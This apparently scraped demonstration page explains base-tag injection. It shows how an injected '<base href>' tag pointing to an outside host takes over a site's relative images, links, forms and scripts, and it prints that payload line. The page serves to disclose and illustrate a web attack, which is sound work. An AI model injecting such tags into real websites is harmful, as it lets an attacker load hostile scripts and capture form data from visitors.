(Almost all) your <base> are belong to us

To summarize, if you can inject a <base> tag in a website, preferably somewhere in the top of a webpage, you can take over and control parts of a website including images, anchors, forms and javascript. Not bad for such a simple tag. PS, this will not work in IE9, as far as I've tested.
(Look at the source of this page to see what's happening)
The document describing this issue is here: http://avuko.net/base.pdf, or http://avuko.net/base.rst if you dislike PDF.
First mentioned on infosecisland: https://www.infosecisland.com/documentview/18264-Almost-All-Your-BASE-Are-Belong-to-Us.html

Before the base tag:

<img> example:

<script> example:

<a href=""> example:

ALLYOURBASE.htm?q=test.htm

<form> example:

Form:

Inserting the <base> tag

<base href="http://ictao.com">

After the base tag

<img> example:

<script> example:

<a href=""> example:

ALLYOURBASE.htm?q=test.htm

<form> example:

Form: